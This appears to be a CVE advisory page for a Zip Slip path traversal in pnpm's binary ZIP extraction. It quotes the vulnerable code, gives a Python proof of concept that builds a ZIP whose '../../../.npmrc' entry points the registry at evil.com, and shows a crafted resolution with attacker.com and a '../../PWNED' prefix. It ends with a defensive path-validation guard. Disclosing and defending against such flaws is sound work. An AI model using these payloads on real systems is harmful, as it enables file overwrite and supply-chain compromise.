CVE-2026-23888

MEDIUM 6.5 | EPSS 0.02%

pnpm: Binary ZIP extraction allows arbitrary file write via path traversal (Zip Slip)

Published: 2026/1/26 | Modified: 2026/2/3

Description

### Summary

A path traversal vulnerability in pnpm's binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors:

1. Malicious ZIP entries containing `../` or absolute paths that escape the extraction root via AdmZip's `extractAllTo`.
2. The `BinaryResolution.prefix` field is concatenated into the extraction path without validation, allowing a crafted prefix like `../../evil` to redirect extracted files outside `targetDir`.

### Details

The vulnerability exists in the binary fetching and extraction logic:

**1. Unvalidated ZIP Entry Extraction (`fetching/binary-fetcher/src/index.ts`)**

AdmZip's `extractAllTo` does not validate entry paths for path traversal:

```typescript
const zip = new AdmZip(buffer)
const nodeDir = basename === '' ? targetDir : path.dirname(targetDir)
const extractedDir = path.join(nodeDir, basename)
zip.extractAllTo(nodeDir, true) // Entry paths not validated!
await renameOverwrite(extractedDir, targetDir)
```

A ZIP entry with path `../../../.npmrc` will be written outside `nodeDir`.

**2. Unvalidated Prefix in BinaryResolution (`resolving/resolver-base/src/index.ts`)**

The `basename` variable comes from `BinaryResolution.prefix` and is used directly in path construction:

```typescript
const extractedDir = path.join(nodeDir, basename)
// If basename is '../../evil', this points outside nodeDir
```

### PoC

**Attack Vector 1: ZIP Entry Path Traversal**

```python
import zipfile
import io

zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as zf:
    # Normal file
    zf.writestr('node-v20.0.0-linux-x64/bin/node', b'#!/bin/sh\necho "legit node"')
    # Malicious path traversal entry
    zf.writestr('../../../.npmrc', b'registry=https://evil.com/\n')

with open('malicious-node.zip', 'wb') as f:
    f.write(zip_buffer.getvalue())
```

**Attack Vector 2: Prefix Traversal via malicious resolution:**

```json
{
  "resolution": {
    "type": "binary",
    "url": "https://attacker.com/node.zip",
    "prefix": "../../PWNED"
  }
}
```

### Impact

- All pnpm users who install packages with binary assets
- Users who configure custom Node.js binary locations
- CI/CD pipelines that auto-install binary dependencies
- Can overwrite config files, scripts, or other sensitive files leading to RCE

Verified on pnpm main @ commit `5a0ed1d45`.
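The mitigation for both vectors is the same check applied before anything touches the filesystem: resolve each ZIP entry name against the extraction root and refuse any entry that does not land inside it, and require the resolution prefix to be a single plain directory name. The TypeScript below is an added example of that guard, not pnpm's code or its fix; the root directory `/tmp/pnpm-extract`, the function names and the list of sample entry names are constructed for illustration (the entry names mirror the advisory's PoC: a legitimate `bin/node`, a `../../../.npmrc` traversal, an absolute entry and a backslash-separated traversal).

```typescript
import * as path from 'path'

// Added example, not pnpm's code: a guard an extractor can run on every ZIP
// entry name before extracting. Returns true only when `relative`, joined
// onto `root`, resolves to a location inside `root`.
export function resolvesInside(root: string, relative: string): boolean {
  // ZIP entry names may use backslashes; treat them as separators so that
  // "..\..\x" cannot slip past a forward-slash-only check.
  const normalized = relative.replace(/\\/g, '/')
  // Absolute entries (POSIX "/x" or Windows "C:/x") must never be honoured.
  if (path.posix.isAbsolute(normalized) || /^[A-Za-z]:/.test(normalized)) {
    return false
  }
  const rootAbs = path.resolve(root)
  const target = path.resolve(rootAbs, normalized)
  // The root itself is allowed (directory entries); anything else must be
  // strictly below it, with a separator so "/tmp/root2" cannot match "/tmp/root".
  return target === rootAbs || target.startsWith(rootAbs + path.sep)
}

export interface EntryCheck {
  allowed: string[]
  rejected: string[]
}

// Partition entry names into those safe to extract under `root` and those
// that would escape it. An extractor should abort on any rejected entry
// rather than silently skip it: a half-extracted binary is itself a risk.
export function checkEntries(root: string, names: string[]): EntryCheck {
  const result: EntryCheck = { allowed: [], rejected: [] }
  for (const name of names) {
    const bucket = resolvesInside(root, name) ? result.allowed : result.rejected
    bucket.push(name)
  }
  return result
}

// The prefix is used as one directory name directly under the extraction
// directory, so the safe shape is exactly one non-dot path segment.
export function isSafePrefix(prefix: string): boolean {
  if (prefix === '' || prefix === '.' || prefix === '..') return false
  if (/[\\/]/.test(prefix)) return false
  return true
}

// Constructed sample (hypothetical root and entry names, not real files).
const SAMPLE_ROOT = '/tmp/pnpm-extract'
const SAMPLE_ENTRIES = [
  'node-v20.0.0-linux-x64/bin/node',        // legitimate
  'node-v20.0.0-linux-x64/lib/../bin/npm',  // ".." that stays inside root
  '../../../.npmrc',                         // traversal from the advisory PoC
  '/absolute/entry',                         // absolute path
  '..\\..\\escaped',                         // backslash-separated traversal
]

export function demo(): EntryCheck {
  return checkEntries(SAMPLE_ROOT, SAMPLE_ENTRIES)
}

console.log(demo())
console.log('prefix "node-v20.0.0-linux-x64" safe:', isSafePrefix('node-v20.0.0-linux-x64'))
console.log('prefix "../../PWNED" safe:', isSafePrefix('../../PWNED'))
```

Running it lists the two legitimate entries as allowed and the three escaping entries as rejected, and flags the `../../PWNED` prefix from the advisory as unsafe while accepting a plain directory name. Checking the resolved absolute path rather than searching for the literal substring `..` is what makes the guard handle the `lib/../bin` case correctly and the `..\..` case at all.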

Affected packages (1)

CVSS score

| Source | Version | Severity | Vector |
|--------|---------|----------|--------|
| osv | CVSS 3.1 | MEDIUM 6.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |

References (5)